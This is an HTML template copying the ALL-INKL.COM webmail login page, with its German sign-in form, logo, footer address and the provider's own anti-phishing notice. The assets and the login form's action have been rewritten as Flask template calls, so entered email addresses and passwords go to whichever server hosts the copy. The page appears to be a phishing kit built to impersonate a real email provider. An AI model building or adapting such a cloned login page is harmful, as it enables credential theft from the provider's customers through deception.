<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="de" xml:lang="de" xmlns="http://www.w3.org/1999/xhtml">
	<head>
		<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
		<title>Webmail - ALL-INKL.COM</title>
		<meta http-equiv="Pragma" content="no-cache" />
		<meta http-equiv="Cache-Control" content="no-cache" />
		<meta http-equiv="expires" content="0" />
		<meta name="description" content="Als Kunde von ALL-INKL.COM können Sie Webmail zum Versenden und Empfangen Ihrer E-Mails nutzen." />
		<link rel="canonical" href="index.html" />
		<meta name="mobile-web-app-capable" content="yes" />
		<meta name="apple-mobile-web-app-capable" content="yes" />
		<meta name="viewport" content="width=device-width, initial-scale=1.0" />
		<meta name="format-detection" content="telephone=no" />
		<link rel="apple-touch-icon" sizes="180x180" href="{{ url_for('static', filename='app/allinkl/apple-touch-icon.png?v=1') }}"/>
		<link rel="icon" type="image/png" sizes="32x32" href="{{ url_for('static', filename='app/allinkl/favicon-32x32.png?v=1')}}" />
		<link rel="icon" type="image/png" sizes="16x16" href="{{ url_for('static', filename='app/allinkl/favicon-16x16.png?v=1')}}" />
		<link rel="manifest" href="{{ url_for('static', filename='app/allinkl/site.webmanifest?v=1')}}" />
		<link rel="mask-icon" href="{{ url_for('static', filename='app/allinkl/safari-pinned-tab.svg?v=1')}}" color="#e2003d" />
		<link rel="shortcut icon" type="image/x-icon" href="{{ url_for('static', filename='app/allinkl/favicon.ico?v=1')}} />
		<meta name="msapplication-TileColor" content="#262626" />
		<meta name="msapplication-config" content="/app/allinkl/browserconfig.xml?v=1" />
		<meta name="theme-color" content="#262626" />
		<meta name="apple-mobile-web-app-status-bar-style" content="#262626" />		<script type="text/javascript">
			(function(window) {
				var inFrame = false;
				try { inFrame = (window.self !== window.top); } catch (e) { inFrame = true; }
				if(inFrame) {
					try { top.location = self.location; } catch (e) {}
				}
			})(window);
		</script>
		<script type="text/javascript">
			window.history.replaceState({}, 'Webmail - ALL-INKL.COM', window.location.href.replace(/(al|data|astdata)=[^&]*&?/g, '').replace(/[\?&]+$/, ''));
		</script>
		<script type="text/javascript" src="js.php?t=main&amp;v=1190998c21d1f5bf5713458a112a0ff40f465f"></script>
		<link rel="stylesheet" type="text/css" media="screen,print" href="{{ url_for('static', filename='layout/login/login.css')}}"/>
	</head>
	<body class="a">
		<div id="wrap">
			<div id="header">
				<h1>
					<img src="{{ url_for('static', filename='layout/login/header-allinkl.png')}}" alt="Webmail - ALL-INKL.COM" />				</h1>
			</div>
			<div id="content">
				<noscript><div class="msg-error">JavaScript ist in Ihrem Browser deaktiviert.
<br/>
<br/>Bitte aktivieren Sie JavaScript oder verwenden Sie einen JavaScript-fähigen Browser, um den Webmailer nutzen zu können.</div></noscript>
								<form action="{{ url_for('login') }}" method="POST">
											<input type="hidden" name="login_target" value="desktop" />
						<h2>Anmelden</h2>
						<div>
							<label for="loginlang" class="label-text">Sprache</label>
							<select id="loginlang" tabindex="1" name="language">
																	<option class="de" value="de" selected="selected">Deutsch</option>									<option class="en" value="en">English</option>									<option class="pl" value="pl">Polski</option>							</select>
						</div>
						<div>
							<label for="loginun" class="label-text">E-Mail</label>
							<input class="text" id="loginun" tabindex="2" type="text" name="login_name" value="" />
						</div>
						<div>
							<label for="loginpw" class="label-text" id="txtloginpw">Passwort</label>
							<input class="text" id="loginpw" tabindex="3" type="password" name="login_password" value="" />
						</div>
						<div class="security-url" role="button">
							<span class="security-url-label">Prüfen Sie bitte, ob in der Adressleiste Ihres Browsers folgende Adresse steht:</span>
							<span class="security-url-addressbar"><img src="{{ url_for('static', filename='layout/login/security-url-allinkl.jpg')}}" alt="" /></span>
							<span class="security-url-popup hide"><b>Warum sehen Sie diese Meldung?</b>
<br/>In letzter Zeit versuchten Betrüger vermehrt mit gefälschten Webseiten vertrauenswürdige Login-Formulare nachzuahmen, um unbefugt an Anmeldedaten heranzukommen (&quot;Phishing&quot;).
<br/>
<br/><b>Wie können Sie sich schützen?</b>
<br/>Achten Sie immer auf unsere Adresse in der Adresszeile im Browser. Betrüger verschicken meist Nachrichten mit Links zu gefälschten Webseiten. Prüfen Sie immer die Adresse oder klicken den Link gar nicht erst an, sondern geben selbst die Ihnen bekannte und vertrauenswürdige Adresse im Browser ein. Geben Sie niemals Ihre Anmeldedaten auf gefälschten Webseiten ein.</span>
						</div>
						<script type="text/javascript">
							$(document).ready(function(){
								$('.security-url').on('click', function() {
									$(this).toggleClass('open');
									$('.security-url-popup').toggleClass('hide');
								});
							});
						</script>
						<div>
															<button type="submit" tabindex="4" class="desktop-only">Anmelden</button>
								<button type="submit" tabindex="4" class="mobile-only">Anmelden an mobiler Version</button>
								<script type="text/javascript">
									$(document).ready(function(){
										var jDesktopOnly = $(".desktop-only:first"),
											jTargetInput = $('form input[name="login_target"]:first'),
											fn = function(){jTargetInput.val((jDesktopOnly.css('display')==='none')?'mobile':'desktop')};
										$(window).resize(fn);
										fn();
										window.setInterval(fn, 50);
									});
								</script>
														</div>
										</form>
				
									<div class="linklist">
						<a href="" class="desktop-only">Zur mobilen Version</a>
						<a href="index.html?m=0" class="mobile-only">Zur Desktop Version</a>
					</div>
								</div>
            <div class="clearer"></div>
			<div id="footer"><span class="footerrow"><a href="/impressum/" target="_blank" rel="nofollow noopener">Impressum</a> | <a href="https://all-inkl.com/agb/" target="_blank" rel="nofollow noopener">AGB</a> | <a href="https://all-inkl.com/datenschutzinformationen/" target="_blank" rel="nofollow noopener">Datenschutzinformation</a></span><span class="footerrow">Neue Medien Münnich | Hauptstraße 68 | D-02742 Friedersdorf | Fon +49 35872 353-10 | Fax +49 35872 353-30</span></div>
		</div>
	</body>
	<!-- dd0802 -->
</html>